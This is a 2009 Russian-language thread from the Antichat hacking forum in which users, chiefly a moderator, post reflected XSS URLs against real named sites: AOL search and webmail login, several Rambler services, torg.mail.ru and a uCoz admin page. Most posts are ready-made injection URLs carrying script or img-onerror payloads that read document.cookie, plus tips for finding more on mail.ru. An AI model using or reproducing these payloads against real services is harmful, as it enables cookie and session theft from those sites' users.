HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу Пассивные xss на почтовых серверах
   
Ответ
Страница 25 из 25 « Первая < 15 21 22 23 24 25
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.08.2009, 00:41
JOHNik
Познающий
Регистрация: 21.04.2009
Сообщений: 58
С нами: 8976725

Репутация: 34
По умолчанию
Цитата:
Сообщение от Pavlov  
http://translate.google.com/translate?hl=ru&sl=en&tl=ru&u=http%3A%2F%2Fforums. xmbforum.com%2Ffiles.php%3Fpid%3D1361320%26aid%3D2 0274
http://translate.google.co.uk/translate?hl=ru&sl=en&tl=ru&u=http%3A%2F%2Fforums. xmbforum.com%2Ffiles.php%3Fpid%3D1361320%26aid%3D2 0274
То же самое и тут (PREF TM LM S)
такая же трабла и с AOL например:
Код:
http://television.aol.com/search/results?searchby=showtitle&query="><script>alert(document.cookie)</script>
просто это не те которые нужны. но идея с переводом документа хорошая
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось JOHNik; 20.08.2009 в 00:58..
 
Ответить с цитированием

  #2  
Старый 25.08.2009, 19:38
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
С нами: 9083308

Репутация: 719
По умолчанию
Цитата:
Сообщение от JOHNik  
Код:
http://television.aol.com/search/results?searchby=showtitle&query="><script>alert(document.cookie)</script>
просто это не те которые нужны. но идея с переводом документа хорошая
там же, куча пассивок, вывешивать не стал чтоб не флудить, но xss на каждом шагу, щя поищу активку

Код:
https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver%3a4%7crt%3aSTANDARD%7cac%3aWS%7cat%3aSNS%7cld%3awebmail.aol.com%7cuv%3aAOL%7clc%3aen-us%7cmt%3aAOL%7csnt%3aScreenName&offerId=mail-second-en-us&seamless=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
Ответить с цитированием

  #3  
Старый 30.08.2009, 07:09
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
С нами: 9083308

Репутация: 719
По умолчанию
пассивная XSS на рамблер, только что нашел

Код:
http://adstat.rambler.ru/reports/rep_show.pl?sid=4294961443&uid=4513&page=200&num=5&end=080911&type=16&start=%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E0&iid=27203
Код:
http://adstat.rambler.ru/reports/rep_show.pl?sid=4294961443&page=206&uid=%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E3&end=080911&type=16&iid=27203&start=080910
Правда в этой строке их до фига и больше...
Последний раз редактировалось satana-fu; 30.08.2009 в 07:13..
 
Ответить с цитированием

  #4  
Старый 24.09.2009, 15:39
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
С нами: 9083308

Репутация: 719
По умолчанию
пассивка на рамблере

Цитата:
http://id-planet.rambler.ru/main/user/blacklist
строка Найти забаненного
PHP код:
<img src=foo.png onerror=alert(document.cookie) /> 

еще одна пассивка на рамблер

PHP код:
http://autorambler.ru/cars/by-price/?price_from=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&raz=1&price_to=250000&model=303&skip=0&currency=RUR 
Последний раз редактировалось satana-fu; 21.10.2009 в 18:24..
 
Ответить с цитированием

  #5  
Старый 24.09.2009, 17:09
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
С нами: 9083308

Репутация: 719
По умолчанию
Цитата:
Сообщение от Ruslan1817  
первый раз сам нашел... на майле... правда с подсказкой :-)
это тоже твой xss, нашел уже с твоей подсказкой

http://torg.mail.ru/109/res/?"><script>alert(document.cookie)</script>[vendor_id][]=49
 
Ответить с цитированием

  #6  
Старый 27.09.2009, 04:37
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
С нами: 9083308

Репутация: 719
По умолчанию
Цитата:
Сообщение от Ruslan1817  
все пассивки прикрыли... как так 0_0
а ты развивай ту. которую начал)))), вот тебе еще пассивка на майл

Цитата:
http://torg.mail.ru/844/res/?%27p3%5Bprice_from%5D=%22%3E%3Cscript%3Ealert%28d ocument.cookie%29%3C%2Fscript%3E
улови какая разница между вышестоящим и этим урл ниже

Цитата:
http://torg.mail.ru/844/res/?p3%5Bprice_from%5D=%22%3E%3Cscript%3Ealert%28docu ment.cookie%29%3C%2Fscript%3E
как только догонишь, найдешь кучу пассивных xss на майле не забудь убрать пробелы
Последний раз редактировалось satana-fu; 21.10.2009 в 15:58..
 
Ответить с цитированием

  #7  
Старый 12.10.2009, 18:30
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
С нами: 9083308

Репутация: 719
По умолчанию
XSS на юкозe (работает только у авторизованных админов сайта)

Цитата:
http://сайт на юкозе.ru/tmpls/?a=fm;n="><script>alert(document.cookie)</script>;ffilter=video;f=auth?ljcUik

Не почтовый сервер, просто не нашел куда засунуть его
Последний раз редактировалось satana-fu; 12.10.2009 в 18:37..
 
Ответить с цитированием
Ответ
Страница 25 из 25 « Первая < 15 21 22 23 24 25



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Веб-уязвимости 43 12.01.2021 19:31
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...